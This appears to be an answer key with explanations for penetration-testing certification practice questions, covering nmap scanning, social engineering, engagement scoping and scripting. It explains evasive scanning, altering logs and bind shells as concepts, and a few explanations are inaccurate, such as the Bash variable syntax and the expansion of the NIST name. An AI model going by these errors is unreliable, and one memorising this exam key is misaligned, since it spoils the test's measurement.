1. C. Because the server is considered a fragile system, you should throttle the bandwidth used by the vulnerability scan. If you don’t, you could easily consume all the server’s resources with the scan and not leave any for critical business operations. You can use the -Tn option with the nmap command to throttle down the scans. In this scenario, you should consider using either the –T2 or possibly even the –T1 option with the nmap command. The –T0 option would probably throttle the scan too much, making it take an inordinate amount of time to complete.

Answer 144

1. D. Passive scanning is a method of vulnerability detection that relies on information obtained from network data that is captured from a target computer without direct interaction. The main advantage of passive scanning for an attacker is that it does not leave a trail that could alert users or administrators. The main advantage for administrators is that it doesn’t cause undesired behavior on the target computer. Passive scanning does have limitations. It is not as complete in details as an active vulnerability scan and cannot detect any applications that are not currently sending out traffic.

Answer 145

1. B. This is an example of a cross-site request forgery (CSRF). Because the session cookie from the website was saved locally, the user is perpetually logged on to the site. Therefore, the HTTP request to change the user’s password contained in the email message didn’t require authentication to execute. The penetration tester can now log on to Active Directory as a high-level employee.

Answer 146

1. A. This is also an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server. In a relay attack, the man-in-the-middle may or may not modify the data being transmitted between the two hosts.

Answer 147

1. B. In this scenario, a command was entered, and the attacker was attempting to gain access to the password file within the /etc directory. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via vulnerable applications. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

Answer 148

1. C. The nmap 192.168.1.0/24 --exclude 192.168.1.250 command causes the nmap utility to scan every system on the subnet from .1 to .254 but skips the host with an IP address of 192.168.1.250.

Answer 149

1. B. Implementing regular security awareness training for all employees is an example of a people-based mitigation strategy.

Answer 150

1. D. To harden a Windows-based computer system, you should disable autorun. This helps prevent malware from being installed on the system when an infected optical disc or USB drive is inserted into the system.

Answer 151

1. B. A false positive is an error in some evaluation processes in which a condition tested for is mistakenly found to have been detected. The scanner might not have sufficient access to the target system to confirm a vulnerability, or it might simply have an error in a plug-in that generates an erroneous vulnerability report. When a scanner reports a vulnerability that does not exist, this is known as a *false positive error*.

Answer 152

1. D. A red team assessment is usually conducted by internal testers to ensure an organization’s IT staff (the blue team) can adequately defend the network. A goal-based assessment is designed to test a specific aspect of an organization’s security. A supply chain test involves testing an organization’s vendors. A compliance-based test is performed to ensure that an organization remains in compliance with governmental regulations or corporate policies.

Answer 153

1. A and D. Both AFL and Peach can be used to perform fuzzing on an application as part of software assurance.

Answer 154

1. A. Advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Threat actors are often rated by their capabilities. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.

Answer 155

1. D. The National Vulnerability Database (NVD) is maintained by the U.S. government’s National Institute of Science and Technology. The NVD can be accessed at [https://nvd .nist.gov](https://nvd.nist.gov). This website provides a summary of current security vulnerabilities ranked by their severity.

Answer 156

1. A. When referencing a value from an array, PowerShell uses the following syntax: $*array\_name*[*position*]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

Answer 157

1. A. When declaring an array, PowerShell uses the following syntax: $*array\_name* = @(*value1, value2, value3, ...*).

Answer 158

1. C and D. In the process of covering your tracks, you should consider taking actions such as removing or hiding any files you copied to the system. You could also consider altering any log entries that were created when you compromised the system. However, there are two things to keep in mind when modifying log files. First, make sure the scope of work for the penetration test allows you to modify log files. Sometimes it will not be allowed. Second, you should not delete all the log entries. This would be a dead giveaway to a defender that you have compromised the system.

Answer 159

1. C. Adding the tail /var/log/firewall 1\> lastevents 2\> &1 command to a Bash script will send both stdout and stderr to the same file.

Answer 160

1. A. A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. A white box test is performed with full knowledge of the underlying network. In a black box test, the testers are not provided with access to or information about the target environment. Compliance-based assessments are designed to test compliance with specific laws.

Answer 161

1. D. Adding the $TargetHost = read-host -Prompt line to a PowerShell script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 162

1. C. The statement of work (SOW) is a formal document that defines the scope of the penetration test. It identifies exactly what will happen during the test. An MSA defines terms that will govern future agreements. An NDA specifies what each party in an agreement is allowed to disclose to third parties. A purchase order is a binding agreement to make a purchase from a vendor.

Answer 163

1. C. Vishing (voice phishing) is social engineering over the phone system. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Vishing works like phishing but is carried out using voice technology. A vishing attack can be conducted by voice email, voice over IP (VoIP), or landline or cellular telephone. In this scenario, since the president is receiving telephone calls, this is a vishing attack.

Answer 164

1. A and B. In this scenario, the wireless network can be hardened by implementing MAC address filtering. This provides a basic layer of protection by preventing unauthorized systems from connecting to the wireless network. However, MAC addresses are easy to spoof once a known-good address has been identified. So, the wireless network can be further hardened by implementing 802.1x authentication. This eliminates the weakness associated with preshared keys by implementing a separate authentication server (such as a RADIUS server).

Answer 165

1. A and E. The scope document must specify, among other things, why the test is being performed and who the target audience is. The other options listed in this question may be included if necessary, but they are not required.

Answer 166

1. C and E. In this example, you know that the device is running the Apache web server. Also notice that the name of the device is “Untangle Server.” By searching the Internet, you can learn that Untangle sells security devices used to manage traffic coming in and out of a network. Therefore, you can reasonably assume that the device is a security device from this company.

Answer 167

1. B. Hiring additional IT staff members who have experience with cyber security is an example of a people-based mitigation strategy.

Answer 168

1. A and C. From a network topology perspective, the PCI-DSS standard requires you to run vulnerability scans from both internal and external network locations. The results of both scans should be compared to identify vulnerabilities.

Answer 169

1. B. A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.

Answer 170

1. A. The Common Vulnerabilities and Exposures (CVE) database is a community-developed resource that contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor anywhere in the world discovers a vulnerability with their product, they add an entry to the CVE database. You could search the CVE site for information about Server 2003 SP2.

Answer 171

1. A. The “Enforce password history” Group Policy setting determines the number of unique new passwords that a user must use before an old password can be reused again. Configuring this policy helps enhance security by preventing users from reusing old passwords.

Answer 172

1. B. Because the tester is given extensive internal access to the target network, a white box test usually provides the most exhaustive assessment. More time can be spent probing for deep vulnerabilities than is possible with a black or gray box test.

Answer 173

1. C. A SMS phishing attack (also called a *smishing* attack) leverages text messaging instead of email to conduct a phishing exploit.

Answer 174

1. D. The programmer in this scenario has used hard-coded credentials. If an attacker (or a penetration tester) were to view the application’s source code, they would have access to the database authentication credentials.

Answer 175

1. A. The –T0 option causes nmap to scan in *paranoid* mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.

Answer 176

1. A. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, one of the requirements specifies that antivirus software be installed on all systems and that it must be updated regularly.

Answer 177

1. D. A compliance vulnerability scan is used to verify that the target organization is in compliance with the requirements of a given law or policy. In this example, a PCI-DSS penetration test usually requires a PCI-DSS compliance vulnerability scan.

Answer 178

1. C. A master services agreement (MSA) sets the overall provisions between two organizations. Many organizations also create an MSA, which will define the terms that the organizations will use for work to be done in the future. This makes ongoing engagements and contracts much easier to work through. This can help organizations prevent the need to renegotiate. MSAs are common when organizations anticipate working together over a period of time or when a support agreement is created.

Answer 179

1. A. By sending fake ARP messages, the tester’s workstation can fool client workstations into thinking it is the web server by associating the server’s IP address with her workstation’s MAC address. Likewise, the server can be fooled into thinking her workstation is the end user’s workstation by doing the same thing, sending a fake ARP message to the server mapping the client’s IP address to her workstation’s MAC address.

Answer 180

1. C. In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !"#$%&’()\*+,-./:;\<=\>?@[\]^\_’{|}~. This will make it harder for attackers to break into the client’s systems.

Answer 181

1. B. One way to conduct a NAC bypass exploit is to spoof the tester’s system with the MAC address of an authorized device. As long as the tester’s system meets the organization security policy requirements, the NAC system should allow it to access the production network.

Answer 182

1. B. Shodan is a specialized tool that a penetration tester can use to search public sources for evidence of an Internet of Things (IoT) device that a target organization may have deployed in their network. This can be useful because IoT devices frequently employ weaker security mechanisms that a penetration tester can exploit.

Answer 183

1. A. Implementing multifactor authentication for VPN connections is an example of a technological mitigation strategy.

Answer 184

1. A. The Internet of Things (IoT) refers to the network of physical products and devices that connect to the Internet. Manufacturers and developers want to minimize costs to increase their profits. Hence, security is often not the key feature of the product or device. So, as with any other device on a network, IoT devices may have security vulnerabilities and may be subject to network-based attacks.

Answer 185

1. C. The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials. Social engineering plays an important role in many attacks. SET is a menu-driven social engineering attack system. In this scenario, the penetration tester is attempting a spear phishing attack.

Answer 186

1. B. Risk response is the process of controlling identified risks. It is a basic step in any risk management process. Risk response is a planning and decision-making process where the client decides how to deal with each risk. Risk avoidance is the elimination of hazards, activities, and exposures that can negatively affect an organization’s assets. This is scenario, the client used risk avoidance by removing the door and putting up a wall.

Answer 187

1. A. An effective way to discover vulnerabilities associated with a specific version of an operating system is to consult the Common Vulnerabilities and Exposures (CVE) database. The CVE database can be accessed at [http://cve.mitre.org](http://cve.mitre.org). It contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor discovers a vulnerability with their product, they add an entry to the CVE database. This database contains vulnerability information for Windows, Mac OS, Linux, UNIX, Android, and iOS operating systems.

Answer 188

1. A. A rainbow table contains a precomputed list of hash values for common passwords that can be used for offline password file cracking.

Answer 189

1. B. The -lt relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other.

Answer 190

1. B and C. The output of the sslyze command in this example shows that the web server responded to TLSv1\_1 and TLSv1\_2 queries but did not respond to SSLv2, SSLv3, or TLSv1 queries.

Answer 191

1. D. The JTAG port is implemented in motherboards made by some manufacturers for diagnostic and testing purposes. With the right equipment, a penetration tester can connect to this port and capture data directly from the running motherboard.

Answer 192

1. B. Before Aircrack-ng can be used to crack the encryption on a wireless network, you must first run the airodump-ng utility on the specific channel used by the transmitting access point to collect the authentication handshake. Then, you need to de-authenticate the wireless client by running the aireplay-ng utility.

Answer 193

1. A. A man-in-the-middle attack happens when communication between two parties is intercepted by an outside entity. Man-in-the-middle attacks are a common kind of cybersecurity attack that allows an attacker to eavesdrop on the communication between two targets. The attack takes place in between two legitimately communicating hosts, allowing the attacker to “listen” to a conversation.

Answer 194

1. B and E. Knowing the company policies and their tolerance to impact are two of the most important items needed to know when planning for an engagement. The others are important as well, but in this scenario the question is which are the two most important. Cybersecurity professionals widely agree that vulnerability management is a critical component of any information security program, and for this reason, many organizations mandate vulnerability scanning in corporate policy, even if that is not a regulatory requirement. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.

Answer 195

1. C. A full scan will provide you with more useful results because it includes more tests. There is no requirement in the scenario that the tester should avoid detection, so a stealth scan is not necessary. But because this is a black box test, it would best to run a full scan on the network.

Answer 196

1. A and B. In this example, the nmap utility was used to run a TCP SYN scan. Both the nmap 10.0.0.1 and nmap 10.0.0.1 –sS commands can be used to run this kind of scan.

Answer 197

1. A. Piggybacking occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person’s knowledge or consent.

Answer 198

1. B. Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive \< NumWeeks \>.

Answer 199

1. C. The until looping structure will keep processing over and over as long as the specified condition evaluates to false.

Answer 200

1. A. This is an example of risk avoidance. By removing the door and filling in the wall with concrete, the client has completely removed the risk of the door being used by an attacker to gain unauthorized access to the facility.

Answer 201

1. D. A malicious insider attack occurs when someone within the organization uses the credentials they have been legitimately given to carry out an attack. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist’s attacks are usually politically motivated, instead of financially motivated. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain.

Answer 202

1. A. The whois tool can be used to gather information about domain ownership from public records. In the example shown in this question, you can learn who the registrar is for the domain, the name of the organization that owns it, the address of the organization, the phone number of the organization, the name of the employee that manages the domain, and that employee’s email address.

Answer 203

1. D. The penetration tester is using scarcity as a motivating factor. By asserting that there are only a small number of devices available at the steeply discounted price, the employees are motivated to make a purchase before supplies run out.

Answer 204

1. C. A retina scan is an example of something you are. Theoretically, no two people should have identical attributes for this type of factor.

Answer 205

1. E. To harden network communications on a Windows-based computer system, you should restrict access to the computer over the network access to only authenticated users.

Answer 206

1. D. ARP spoofing is a technique in which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Normally, the goal is to associate the attacker’s Media Access Control (MAC) address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic.

Answer 207

1. A. An if/then flow control structure in Ruby uses the following syntax: * if *condition* * *commands...* * else * *commands...* * end

Answer 208

1. E. When enumerating a target network during a white box penetration test, you will likely gather a great deal of information. For example, you will probably want to enumerate any web pages, applications, services, and tokens used on the network.

Answer 209

1. A or B. Either the ncat or netcat remote access tool could be used to set up a bind shell exploit.

Answer 210

1. A. The conclusion is your opportunity to summarize your report and to make recommendations. The conclusion is the final overview of the test. It should end on a positive note giving the client support and guidance.

Answer 211

1. C. In this example, the nmap utility was used to scan the open ports on the host listed in the command and then determine the version of the service using each of those ports. This is done by running nmap with the –sV option.

Answer 212

1. C. Because the penetration tester has no knowledge of the target, a black box test takes the most time and money to conduct. In contrast, gray box and white box tests are usually must less expensive and take less time to conduct because the tester has some level of prior knowledge about the target.

Answer 213

1. C and E. Both foremost and FTK are forensic tools. They are used to gather and analyze digital evidence from a cyber crime scene.

Answer 214

1. B and D. Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, the domain controller shouldn’t be running Hyper-V, which is used for virtualization. Likewise, Federation Services is used only in situations where one Active Directory domain is linked to (“federated”) with a different Active Directory domain.

Answer 215

1. A and B. Both Findsecbugs and Yet Another Source Code Analyzer (YASCA) can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.

Answer 216

1. D. A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions.

Answer 217

1. A. Clickjacking is when a tester uses multiple transparent layers to trick a user into clicking a button or link on another page when they were intending to click the top-level page. The tester is “hijacking” clicks and routing them to another page. In web browsers, clickjacking is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking a button that appears to perform another function.

Answer 218

1. B. The declare –i TOTAL command will create the TOTAL variable and type it as *integer*.

Answer 219

1. D. Before conducting a penetration test, you must get written permission from the senior management of the client’s organization to start the test. It is not acceptable to get permission verbally or by email. It is also not acceptable to obtain permission from the IT staff.

Answer 220

1. D. The Common Attack Pattern, Enumeration and Classification (CAPEC) database is a community-developed resource that can be accessed at [http://capec.mitre.org](http://capec.mitre.org). The CAPEC database contains a catalog of commonly used cyber attack patterns.

Answer 221

1. D. Before conducting a penetration test, you must get written permission from the senior management of the target organization to perform the test. Getting permission verbally or via email is generally not acceptable. Getting permission from the IT staff is also generally not acceptable.

Answer 222

1. C. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The A in DAD stands for alteration, which refers to making unauthorized changes to information or systems. In this scenario, Brittany has altered the employee pay accounting system.

Answer 223

1. A. When nmap indicates a port is *closed*, it usually means either the associated service is not installed at all or it has been installed but currently isn’t running. Therefore, nothing is listening on its associated port.

Answer 224

1. B. Swagger is an open specification for defining REST APIs. A Swagger document is the REST API equivalent of a WSDL document for a SOAP-based web service. The Swagger document specifies the list of resources that are available in the REST API and the operations that can be called on those resources. It also specifies the list of parameters to an operation, including the name and type of the parameters, whether the parameters are required or optional, and information about acceptable values for those parameters. So, access to a Swagger document provides testers with a good view of how the API works and thus how they can test it.

Answer 225

1. A and B. The rules of engagement (ROE) should always include the timeline that testing will be conducted as well as a review of any laws, especially any that govern the client to ensure that you don’t break any. A list of other organizations that you have previously tested or a list of the client’s competition is not required to be included in the ROE document. A detailed map of the client’s network would not be needed for the ROE but may be needed for the penetration testing.

Answer 226

1. A and B. In this scenario, you are conducting a white box assessment. So, when requesting internal architectural diagrams as a part of testing, you should usually be supplied with documentation such as network diagrams and facility maps. You can use this information to help map out the network topology and to locate key infrastructure devices, such as switches, routers, and servers.

Answer 227

1. A and F. One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL : This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version information.

Answer 228

1. E and F. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input.

Answer 229

1. B. A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.

Answer 230

1. C. The default port used by the SSH service is 22. The SSH protocol is used to remotely manage systems using a command line interface. Unlike Telnet, SSH uses encryption to protect authentication credentials as well as the data being transmitted between the client and the server.

Answer 231

1. D. A statement of work (SOW) is an agreement that should be defined during the planning and scoping phase of a penetration test. It contains a working agreement between the penetration tester and the client that identifies specific techniques, tools, activities, deliverables, and schedules for the test. It may be used in conjunction with an existing master services agreement (MSA).

Answer 232

1. A. The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

Answer 233

1. C. A script kiddie usually lacks the technical sophistication to mount an attack using their own tools. Instead, they typically download existing tools and run them. Because these tools are already known to the cybersecurity community, script kiddies generally pose less of a threat than the other types of actors in the adversary tier list.

Answer 234

1. B. In this example, the line that reads “250 2.1.5 Recipient OK” indicates that this is a valid email address within the target organization’s domain. Because this is a valid email address, you now know that the organization most likely uses an email naming convention of *first\_initial*+*lastname*@*company\_name*.com. Using this information, you could reference the organization’s executive bio web page and construct email addresses for all of its management team members.

Answer 235

1. B. Most decompilers produce assembly-level source code, not C++ code. For this information to be useful, you need extensive experience working with assembly language code. Typically, this will require you to hire a consultant with an extensive understanding of assembly programming.

Answer 236

1. D. To harden a server system, you should make sure all stale user accounts are disabled or deleted. In this scenario, the client doesn’t want to delete the accounts because the temporary or contract users may be coming back in the future. To lock an account manually, you can use the passwd –l command followed by the name of the user.

Answer 237

1. D. The pty module lets a penetration tester spawn a pseudoterminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade the shell, just run the command shown. su is a Unix command that stands for substitute user. It is used by a computer user to execute commands with the privileges of another user account. When executed, it invokes a shell without changing the current working directory or the user environment.

Answer 238

1. C. The -iL file\_name option tells nmap to read the specified file and scan only those hosts listed in the file.

Answer 239

1. D. It is vital to know which service set identifiers (SSIDs) belong to your target and which are invalid targets. Also, knowing which subnets or IP ranges are in scope is also important to avoid targeting the wrong network or going outside of the penetration test’s scope. Knowing the SSIDs that are in scope is critical when working in shared buildings. Penetrating the wrong network could cause legal or even criminal consequences.

Answer 240

1. A and B. Your first response to the client’s lack of best practices would to be to exploit the devices with default usernames and passwords later in your penetration test. Then, you should recommend that the client adopt better best practices in your final report.

Answer 241

1. D. The timeline for the engagement and when testing can be conducted will have the biggest impact on the observation and testing of the client’s systems during peak hours. Some assessments will be scheduled for noncritical time frames to minimize the impact of any potential outages, while others may be scheduled during normal business hours to help test the organization’s reaction to attacks.

Answer 242

1. A. Banner grabbing is the process of manually connecting to a device, such as a web server, using a utility such as a Telnet client or Ncat and using the information displayed to fingerprint the device.

Answer 243

1. B. When referencing the value of a variable, Bash uses the following syntax: {$*variable\_name*}. In this example, the echo command is being told to display the value of the variable named ServerName on the screen.

Answer 244

1. A. A discovery scan is designed to simply map out every system on the target network using very nonintrusive mechanisms (such as ping) to enumerate the network. Because of this, this type of scan is the least likely to be detected by an IDS or IPS device.

Answer 245

1. A. NBTSTAT identifies NetBIOS servers with an ID of \<20\>. Based on this output, you know that DEV-1 is most likely a Windows server (or a Linux server running the Samba service).

Answer 246

1. A and B. Using unquoted paths to services is one way that services can be exploited on a Windows system. By not quoting paths to services, any spaces in a directory name won’t be processed correctly and can cause a malicious service executable located deliberately in the resulting unquoted directory path to be loaded instead of the correct service executable. In addition, writeable service executable files can be replaced with malicious executables with the same file name.

Answer 247

1. B. By masquerading as a fellow employee in great distress in this scenario, the penetration tester is using urgency to motivate the employee to give up his username and password. She may also be using likeability as a factor.

Answer 248

1. B. Computer-controlled manufacturing devices are examples of nontraditional systems. These devices are considered fragile because they are difficult to manage in the traditional sense and they are probably updated on an infrequent basis by the vendor. They may also have not been subjected to extensive security testing by the vendor.

Answer 249

1. A. A voice phishing attack (also called a *vishing* attack) leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.

Answer 250

1. B. In this scenario we are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if..then..else statements.

Answer 251

1. D and E. VoIP phones and SCADA devices typically cannot be configured in a manner that allows them to meet the security policy requirements of a NAC system. For example, you usually can’t install antimalware software on a VoIP phone or a SCADA device. Therefore, these systems are commonly whitelisted in NAC implementations, allowing them to bypass the requirements applied to other systems.

Answer 252

1. B. This is an example of session hijacking. The tester was able to exploit the session key (the cookie) to gain access to the user’s session. This type of exploit can be used for web applications where an HTTP cookie is used to maintain a session. Even though the site may have used TLS/SSL to encrypt authentication credentials, the session cookie is many times not encrypted. If it is captured, it allows the tester to hijack the user’s session.

Answer 253

1. D. The National Vulnerability Database (NVD) is the U.S. government repository of standards based on vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics.

Answer 254

1. B and C. The nmap and hping utilities can be used to actively enumerate and fingerprint target systems. Hping is a command-line tool that allows testers to artificially generate network traffic. Hping is popular because it allows you to create custom packets. Nmap is the most commonly used command-line vulnerability scanner and is a free, open-source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Whois is a tool that gathers information from public records about domain ownership. Aircrack-ng provides the ability to conduct replay and deauthentication attacks and to act as a fake access point.

Answer 255

1. A. Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.

Answer 256

1. B. Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

Answer 257

1. B. The “Account lockout duration” Group Policy setting determines how long a locked account remains locked before being automatically unlocked. This policy setting helps prevent brute-force attacks by severely increasing the amount of time required to conduct the attack.

Answer 258

1. A and E. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used elicitation techniques to gather sensitive information from employees.

Answer 259

1. C. The fact that the server’s administrator hasn’t renewed its security certificate indicates that they aren’t paying much attention to this server. This would make this system a ripe target for compromise because it is possible that there are other factors (such as updates) that the administrator has also neglected.

Answer 260

1. B. Cybersecurity professionals use the well-known CIA triad model to describe the goals of information security. The letter I in CIA stands for integrity, which seeks to prevent unauthorized modification of information or systems.

Answer 261

1. D. Knowing which SSIDs are in scope is critical when conducting a penetration test within a shared facility with many tenants. Compromising the wrong wireless network is illegal and could result in prosecution and/or a lawsuit.

Answer 262

1. C. The Drozer utility provides a complete security auditing and attack framework designed exclusively for mobile devices running the Android operating system.

Answer 263

1. A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Answer 264

1. A and B. Alternatives to a SOW used by the U.S. federal government include a statement of objectives (SOO) and a performance work statement (PWS). Purchase orders and a noncompete agreements are not typically used as alternatives to a SOW.

Answer 265

1. C. The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials. Social engineering plays an important role in many attacks. SET is a menu-driven social engineering attack system. In this scenario, the penetration tester is attempting a spear phishing attack.

Answer 266

1. D. Port 21 is for TCP and FTP and is used as a control port. Port 80 is for TCP and HTTP and is used for transferring web pages. Port 443 is used for TCP, HTTPS, and is HTTP over TLS/SSL and is for encrypted transmission. In this scenario, all the ports that the penetration tester has discovered have to do with the Web. So, the answer for this question would be that sensitive information may be revealed on the web servers since those were the ports indicated during the vulnerability scan.

Answer 267

1. D. When conducting a white box penetration test, especially one that will target applications developed in-house, having the documentation for the SDK that was used to create the application can be very helpful. Data flow diagrams can also provide penetration testers with an understanding of how the target application communicates with other network services. Configuration files may contain account information, IP addresses, API keys, and possibly even passwords.

Answer 268

1. D. In this example, the output tells us that the email server responds to SMTP HELO commands. Useful information can sometimes be gleaned from an email server using HELO commands.

Answer 269

1. A. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The first D in DAD stands for disclosure, which refers to gaining unauthorized access to information or systems.

Answer 270

1. B. Confidentiality controls seek to prevent disclosure attacks. Even though confidentiality agreements (CAs) are legal documents that help to enforce confidential relationships between two parties, this question asks why it is important to maintain confidentiality of findings. If an attacker was to receive word of findings during a penetration test, they could use those to compromise your client’s system.

Answer 271

1. B. In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 272

1. E. The information gathered during a vulnerability scan can be categorized in many different ways. For example, it may be appropriate to categorize the information based on the operating system because different OSs have different inherent vulnerabilities. It may also be appropriate to categorize the information by the value of each associated asset. For example, vulnerabilities associated with a mission-critical database server would be of much higher value than the vulnerabilities associated with an end user’s desktop system. You could also categorize the scan results based on the number or severity of the vulnerabilities found.

Answer 273

1. C. The -p U:20,T:21,22 command tells nmap to just scan UDP port 20 and TCP ports 21 and 22. The other options in this question will also scan these ports; however, they also scan many other unwanted ports.

Answer 274

1. D. When creating an associative array in a Ruby script, you use the following syntax: \_*array\_name* = {"*element\_name*" =\> "*value*"} . In this example, the line \_Target = {"HostName" =\> "FS1"} assigns a value of FS1 to the element named HostName within the Target array.

Answer 275

1. C. The default port for the Telnet service is 23. Telnet is used to remotely manage a system using a command-line interface. Telnet is a very old and insecure protocol. All information transmitted between the Telnet server and client is sent unencrypted, including authentication information. By sniffing traffic going in and out of this host on port 23, you may be able to capture usernames and passwords.

Answer 276

1. B. The term *de-confliction* refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is actually part of the authorized penetration test or whether it has been instigated by a third-party hacker.

Answer 277

1. B and C. In this scenario, the router can be hardened by creating an encrypted password for privileged access. This is done using the enable secret command on the router. In addition, procedures should be set in place to vet visitors who claim to be representatives of IT vendors.

Answer 278

1. B and E. The key to a successful whaling exploit is having detailed information about the leaders in the target organization. Useful information can often be gleaned from the organization’s website in the form of press releases and executive bios. This information can provide you with names, positions, and possibly even contact information.

Answer 279

1. C. This is an example of a default credentials attack. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These defaults are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.

Answer 280

1. D. Subject Alternative Name (SAN) is an extension to X.509 that allows various values to be associated with a security certificate using a subjectAltName field. These values are called SANs and include email addresses, IP addresses, URLs, DNS names, directory names, and other names followed by a value. Using SAN provides extended site validation.

Answer 281

1. A. If the penetration tester finds a critical issue with the security of their client’s environment, they should not wait for the delivery of their final report. By leaving a critical vulnerability unaddressed, it may put the client at an unacceptable level of risk and result in a potential compromise. The tester should immediately notify management of the issue.

Answer 282

1. D. Maltego is a utility that penetration testers frequently use to organize the information they have gathered from OSINT sources. One of its key benefits is its ability to graphically display the information discovered and visually link it together.

Answer 283

1. A. The –f option causes nmap to scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.

Answer 284

1. B. When referencing a value from an array, Bash uses the following syntax: {$*array\_name*[*position*]}. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

Answer 285

